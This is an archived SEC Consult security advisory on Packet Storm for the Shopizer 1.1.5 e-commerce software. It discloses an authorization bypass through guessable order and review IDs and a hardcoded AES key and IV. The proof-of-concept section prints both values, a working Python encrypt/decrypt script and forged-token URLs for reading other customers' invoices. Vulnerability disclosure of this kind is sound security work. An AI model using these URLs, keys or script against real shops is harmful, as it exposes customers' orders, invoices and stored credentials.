exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Shopizer 1.1.5 Authorization Bypass / Hardcoded Key

Shopizer 1.1.5 Authorization Bypass / Hardcoded Key
Posted Jul 11, 2014
Authored by Kestutis Gudinavicius | Site sec-consult.com

Shopizer version 1.1.5 suffers from authentication and authorization bypass vulnerabilities and also has a hardcoded default encryption key.

tags | exploit, vulnerability
SHA-256 | 3151b133fe3a990ab5b4430efd7f97f3a1ea24619f03afeb2acc81fee40ad78c

Shopizer 1.1.5 Authorization Bypass / Hardcoded Key

Change Mirror Download
SEC Consult Vulnerability Lab Security Advisory < 20140710-1 >
=======================================================================
title: Multiple high risk vulnerabilities in Shopizer webshop
product: Shopizer
vulnerable version: 1.1.5 and below
fixed version: v2 (new codebase)
impact: high
homepage: http://www.shopizer.com/
found: 2012-09-04
by: K. Gudinavicius
SEC Consult Vulnerability Lab
https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
Shopizer is an open source java shopping cart and e-commerce content
management software (CMS). The system is built on Struts 2, Hibernate and
Spring. JQuery ui and ajax are heavily used on the ui as well as DWR and
Struts2-jQuery plug-in. (http://www.shopizer.com/)



Vulnerability overview/description:
-----------------------------------
Shopizer is prone to the following high risk vulnerabilities:

1) Authentication/authorization bypass

The authentication and authorization mechanism provided by the web application
is prone to an authentication/authorization bypass vulnerability, which can be
easily exploited by remote attackers for gaining access to private
information. Malicious actions can be performed by directly calling internal
methods which are supposed to be accessed only by authenticated and permitted
users.


2) Hardcoded default encryption key

A default encryption key is used across all versions of the Shopizer. It can't
be changed, for example, by editing a configuration file, because it's
hardcoded in the source code of the web application. The default encryption
key can be used to encrypt special values allowing access to the sensitive
information.



Proof of concept:
-----------------
1) Authentication/authorization bypass

The viewFiles method is vulnerable to authentication bypass. By changing the
value of the orderId parameter (e.g. by incrementing it) it is possible to
access and download ordered files of other users. This means that a malicious
user can completely bypass the checkout process and even he doesn't need an
account in order to gain access to the data that is sold on the target
website. In the following example files of the order with the ID 61 will be
accessed.

/shop/checkout/viewFiles.action?orderId=61

The removeReview method is vulnerable to authorization bypass. An
authenticated user can remove arbitrary product reviews by changing the value
of the reviewId parameter (e.g. by incrementing it). The following URL will
remove the product review with the ID 398.

/shop/profile/removeReview.action?reviewId=398


2) Hardcoded default encryption key

The hardcoded default encryption key is 1000000000000000
(SecurityConstants.java) and the default initialization vector is
fedcba9876543210 (EncryptionUtil.java). Both values were extracted from the
publicly available versions of the Shopizer. The following is the source code
of a Python script that can be used to decrypt and encrypt arbitrary values by
using the extracted keys.

from Crypto.Cipher import AES
from binascii import unhexlify
import sys

mode = AES.MODE_CBC
size = AES.block_size

pad = lambda s: s + (size - len(s) % size) * chr(size - len(s) % size)

def decrypt(ciphertext):
ciphertext=unhexlify(ciphertext)
decryptor = AES.new('1000000000000000', mode,'fedcba9876543210')
plain = decryptor.decrypt(ciphertext)
print repr(plain)

def encrypt(plaintext):
sample=pad(plaintext)
encryptor = AES.new('1000000000000000', mode,'fedcba9876543210')
plain = encryptor.encrypt(sample)
print plain.encode('hex')

if __name__=='__main__':
if len(sys.argv)<3:
print "Usage: %s encrypt|decrypt text" % sys.argv[0]
sys.exit(1)
elif sys.argv[1]=='decrypt':
decrypt(sys.argv[2])
elif sys.argv[1]=='encrypt':
encrypt(sys.argv[2])

The tool can be used to gain access to the invoices of other users. The
prepareSimpleInvoice action takes encrypted value of the order number that is
incremental. For example, to gain access to the invoice of the 57 order the
57|0 string must be encrypted:

C:\>python aes.py encrypt "57|0"
0664567580f32d3398a981cf51285057

The encrypted string is then used as a value for the fileId parameter of the
following URL:

/shop/cart/prepareSimpleInvoice.action?fileId=0664567580f32d3398a981cf51285057

Other parts of the web application such as passwords and ordered files also
depend on the same encryption keys. If an attacker is able to gain access to
the database where encrypted user credentials are stored, he can easily
decrypt and use them in the further attacks.



Vulnerable / tested versions:
-----------------------------
The vulnerabilities have been verified to exist in version 1.1.5 of Shopizer,
which is the most recent version at the time of discovery.



Vendor contact timeline:
------------------------
2012-01-10: The vulnerabilities have been found during a short blackbox test
of a shopizer installation during a customer project
2012-12-20: Customer allows contacting vendor
2013-01-10: Contacting vendor through support@shopizer.com, fast reply,
sending advisory
2013-01-22: Asking for status update, reply: vendor takes a look
2013-02-26: Asking for status update, vendor has some questions regarding
version numbers
2013-03-22: Asking for status update again
2013-03-23: Vendor: Release 2 is scheduled for June
2013-06-25: Asking for status update, no answer
2013-07-01: Sending deadline for advisory release
2013-07-07: Vendor: Version 2 of shopizer delayed
2013-07-08: Asking for new release date
2013-07-09: Vendor: moving from Struts to Spring & Spring security
2013-10-03: Asking again for release date
2013-10-06: Vendor: Release shortly
2013-12-10: Asking for update
2013-12-12: Vendor: Release date set for January 2014
2014-06: Vendor releases v2
2014-07-10: SEC Consult releases security advisory



Solution:
---------
Using the old version branch 1.x is not recommended as there are no security
fixes implemented by the vendor.

Version 2 has been released by the vendor, but it has not been tested by SEC Consult
and it is unclear whether the issues have been solved.


Workaround:
-----------
-


Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab

SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius

Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF K. Gudinavicius / @2012, 2013, 2014

Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close